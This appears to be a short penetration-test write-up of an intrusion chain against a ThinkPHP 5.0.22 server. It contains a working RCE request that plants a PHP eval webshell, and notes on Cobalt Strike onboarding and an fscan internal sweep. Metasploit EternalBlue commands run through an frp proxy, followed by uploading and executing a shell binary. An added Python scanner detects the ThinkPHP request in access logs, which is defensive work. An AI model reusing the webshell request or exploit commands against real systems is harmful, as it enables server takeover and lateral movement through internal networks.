Perimeter breach
thinkphp 5.0.22
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak.php&vars[1][]=%3C%3Fphp+%40eval%28%24_POST%5B%27code%27%5D%29%3B HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host:
Accept: */*
Connection: close
getshell
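A detection-side view of the request above, as an added example that is not part of the original write-up: it flags access-log entries whose `s` route carries a namespaced class and reaches `invokefunction`. The log lines are constructed (with a placeholder in place of the written file content), and the function names and the log layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed layout: the request line appears quoted, as in common/combined access logs.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def thinkphp_rce_indicators(target):
    """Return the reasons a request target resembles the invokefunction request."""
    reasons = []
    # parse_qsl percent-decodes, so "\" and "%5C" are treated the same way.
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        low = value.lower()
        if key == "s" and "\\" in value:
            # A legitimate module/controller/action route contains no backslash.
            reasons.append("namespaced class in route parameter s")
            if low.rstrip("/").endswith("invokefunction"):
                reasons.append("route reaches invokefunction")
        elif key == "function" and low == "call_user_func_array":
            reasons.append("function=call_user_func_array")
        elif key.startswith("vars[") and low == "file_put_contents":
            reasons.append("file_put_contents passed as callable")
        elif key.startswith("vars[") and "<?php" in low:
            reasons.append("PHP source passed as argument")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match and (reasons := thinkphp_rce_indicators(match.group(1))):
            hits.append((number, reasons))
    return hits

# Constructed sample log: one ordinary route, one request shaped like the one above.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?s=/index/index/hello HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /index.php?s=/index/%5Cthink%5Capp/invokefunction'
    '&function=call_user_func_array&vars[0]=file_put_contents'
    '&vars[1][]=bak.php&vars[1][]=%3C%3Fphp+PLACEHOLDER HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: " + "; ".join(reasons))
```

A hit on the route check alone is worth reviewing; a hit followed by a new `.php` file in the web root, such as the `bak.php` written here, indicates the write succeeded.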
Functions are disabled, so attempt a bypass
Bring the host online in CS directly
Sweep the internal network with fscan
[+] 10.10.11.191 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] 10.10.11.197 (Windows 10 Pro 10240)
Start with EternalBlue
Open a proxy with frp
msf6 > setg Proxies socks5:127.0.0.1:6000
Proxies => socks5:127.0.0.1:6000
msf6 > set ReverseAllowProxy true
ReverseAllowProxy => true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.11.191
rhost => 10.10.11.191
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Obtained an interactive shell
The internal host has no outbound access, so bring it online through a forwarder
meterpreter > upload ~/shell.exe sys.exe
[*] Uploading : /root/shell.exe -> sys.exe
[*] Uploaded 289.00 KiB of 289.00 KiB (100.0%): /root/shell.exe -> sys.exe
[*] Completed : /root/shell.exe -> sys.exe
meterpreter > execute -f "sys.exe"
Process 2700 created.
Then continue sweeping the internal network